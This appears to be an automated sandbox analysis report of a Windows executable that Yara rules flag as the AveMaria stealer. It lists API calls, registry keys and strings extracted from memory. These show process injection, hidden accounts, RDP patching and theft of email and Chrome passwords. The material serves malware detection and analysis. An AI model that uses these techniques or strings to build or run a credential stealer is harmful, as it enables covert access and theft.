Source: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000001.00000003.544704183.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000001.00000003.544839095.00000000012B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000001.00000000.540303660.0000000001047000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000001.00000002.808730735.0000000003325000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_01043279

1_2_01043279

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: String function: 010336F7 appears 73 times
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: String function: 0103357C appears 36 times
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: String function: 01041E88 appears 49 times

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_0103EDA9 GetCurrentProcess,NtQueryInformationProcess,

1_2_0103EDA9

Source: ax4BSyUKd4.exe

ReversingLabs: Detection: 97%

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

File read: C:\Users\user\Desktop\ax4BSyUKd4.exe

Jump to behavior

Source: ax4BSyUKd4.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_01040B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,

1_2_01040B38

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

File created: C:\Users\user\AppData\Local\Microsoft Vision\

Jump to behavior

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@1/0@2/1

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_010448B6 CoInitialize,CoCreateInstance,VariantInit,CoUninitialize,

1_2_010448B6

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_0103D33C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

1_2_0103D33C

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_01042155 CreateToolhelp32Snapshot,Process32FirstW,CharLowerW,CharLowerW,lstrcmpW,Process32NextW,CloseHandle,CloseHandle,

1_2_01042155

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_01045169 LoadResource,SizeofResource,LockResource,GetTempPathA,GetTempPathA,lstrcatA,lstrcatA,GetTempPathA,lstrcatA,CreateFileA,WriteFile,CloseHandle,wsprintfA,ShellExecuteExA,

1_2_01045169

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

File created: C:\Program Files\Microsoft DN1

Jump to behavior

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Directory created: C:\Program Files\Microsoft DN1

Jump to behavior

Source: ax4BSyUKd4.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: ax4BSyUKd4.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: ax4BSyUKd4.exe
Source:	Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: ax4BSyUKd4.exe

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_010311C0 push eax; ret	1_2_010311D4
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_010311C0 push eax; ret	1_2_010311FC
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_0103E39B push 8B50FFFFh; iretd	1_2_0103E3A9
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_0103E3D3 push 8B50FFFFh; iretd	1_2_0103E3DE
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_0103E424 push 8B50FFFFh; iretd	1_2_0103E42F

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_010409ED LoadLibraryA,GetProcAddress,

1_2_010409ED

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_0103D2B8 NetUserAdd,NetLocalGroupAddMembers,

1_2_0103D2B8

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_0103290E URLDownloadToFileW,ShellExecuteW,

1_2_0103290E

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_0103A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,	1_2_0103A36F
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_01039E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,	1_2_01039E2D
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_01043695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,	1_2_01043695

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_0103D3A8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

1_2_0103D3A8

Hooking and other Techniques for Hiding and Protection

Contains functionality to hide user accounts

Source: ax4BSyUKd4.exe	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ax4BSyUKd4.exe, 00000001.00000002.808730735.0000000003325000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ax4BSyUKd4.exe, 00000001.00000002.808730735.0000000003325000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: ax4BSyUKd4.exe, 00000001.00000000.540303660.0000000001047000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ax4BSyUKd4.exe, 00000001.00000000.540303660.0000000001047000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: ax4BSyUKd4.exe, 00000001.00000003.544839095.00000000012B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ax4BSyUKd4.exe, 00000001.00000003.544839095.00000000012B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: ax4BSyUKd4.exe, 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ax4BSyUKd4.exe, 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: ax4BSyUKd4.exe, 00000001.00000003.544704183.00000000012AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ax4BSyUKd4.exe, 00000001.00000003.544704183.00000000012AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: ax4BSyUKd4.exe	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ax4BSyUKd4.exe	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

File opened: C:\Users\user\Desktop\:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe TID: 6500

Thread sleep count: 70 > 30

Jump to behavior

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,

1_2_0103D8FB

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_1-10066

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_0103955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,		1_2_0103955B
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_01041446 FindFirstFileW,FindNextFileW,		1_2_01041446

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_0104154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,

1_2_0104154A

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	API call chain: ExitProcess graph end node			graph_1-10295
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	API call chain: ExitProcess graph end node			graph_1-15582

Source: ax4BSyUKd4.exe, 00000001.00000003.544983228.00000000012B5000.00000004.00000020.00020000.00000000.sdmp, ax4BSyUKd4.exe, 00000001.00000003.544839095.00000000012B1000.00000004.00000020.00020000.00000000.sdmp, ax4BSyUKd4.exe, 00000001.00000003.544723791.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, ax4BSyUKd4.exe, 00000001.00000002.808635246.000000000128A000.00000004.00000020.00020000.00000000.sdmp, ax4BSyUKd4.exe, 00000001.00000003.544704183.00000000012AD000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_010409ED LoadLibraryA,GetProcAddress,

1_2_010409ED

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_01036034 GetProcessHeap,RtlFreeHeap,

1_2_01036034

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_01041B3F mov eax, dword ptr fs:[00000030h]	1_2_01041B3F
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_01041B38 mov eax, dword ptr fs:[00000030h]	1_2_01041B38
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_01041E6D mov eax, dword ptr fs:[00000030h]	1_2_01041E6D

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject threads in other processes

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_01037B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,	1_2_01037B2E
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_01037D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,	1_2_01037D5E
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: 1_2_01043F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,	1_2_01043F7F

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe

1_2_0104405F

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_01042E91 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError,

1_2_01042E91

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_01040A8C AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid,

1_2_01040A8C

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_01040E5E cpuid

1_2_01040E5E

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Code function: 1_2_01038D0F GetModuleHandleA,SHGetFolderPathW,lstrcatW,lstrcatW,CreateDirectoryW,lstrcpyW,lstrcatW,GetLocalTime,wsprintfW,CreateFileW,CloseHandle,RegisterClassW,CreateWindowExW,GetMessageA,GetMessageA,TranslateMessage,DispatchMessageA,GetMessageA,

1_2_01038D0F

Lowering of HIPS / PFW / Operating System Security Settings

Increases the number of concurrent connection per server for Internet Explorer

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe

Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10

Jump to behavior

Stealing of Sensitive Information

Yara detected AveMaria stealer

Source: Yara match	File source: ax4BSyUKd4.exe, type: SAMPLE
Source: Yara match	File source: 1.2.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.544704183.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.544839095.00000000012B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.540303660.0000000001047000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.808730735.0000000003325000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Contains functionality to steal e-mail passwords

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: POP3 Password	1_2_010399FF
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: SMTP Password	1_2_010399FF
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: IMAP Password	1_2_010399FF

Contains functionality to steal Chrome passwords or cookies

Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: \Google\Chrome\User Data\Default\Login Data		1_2_0103B917
Source: C:\Users\user\Desktop\ax4BSyUKd4.exe	Code function: \Chromium\User Data\Default\Login Data		1_2_0103B917

Source: Yara match	File source: ax4BSyUKd4.exe, type: SAMPLE
Source: Yara match	File source: 1.2.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.544704183.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.544839095.00000000012B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.540303660.0000000001047000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.808730735.0000000003325000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ax4BSyUKd4.exe PID: 6504, type: MEMORYSTR

Remote Access Functionality

Yara detected AveMaria stealer

Source: Yara match	File source: ax4BSyUKd4.exe, type: SAMPLE
Source: Yara match	File source: 1.2.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.ax4BSyUKd4.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.544704183.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.544839095.00000000012B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
